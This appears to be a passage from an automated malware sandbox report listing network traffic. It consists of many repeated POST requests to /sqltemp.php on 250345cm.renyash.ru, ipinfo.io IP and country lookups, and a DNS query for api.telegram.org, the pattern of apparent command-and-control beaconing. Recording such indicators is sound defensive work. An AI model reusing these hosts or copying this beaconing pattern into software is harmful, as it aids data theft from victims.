                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
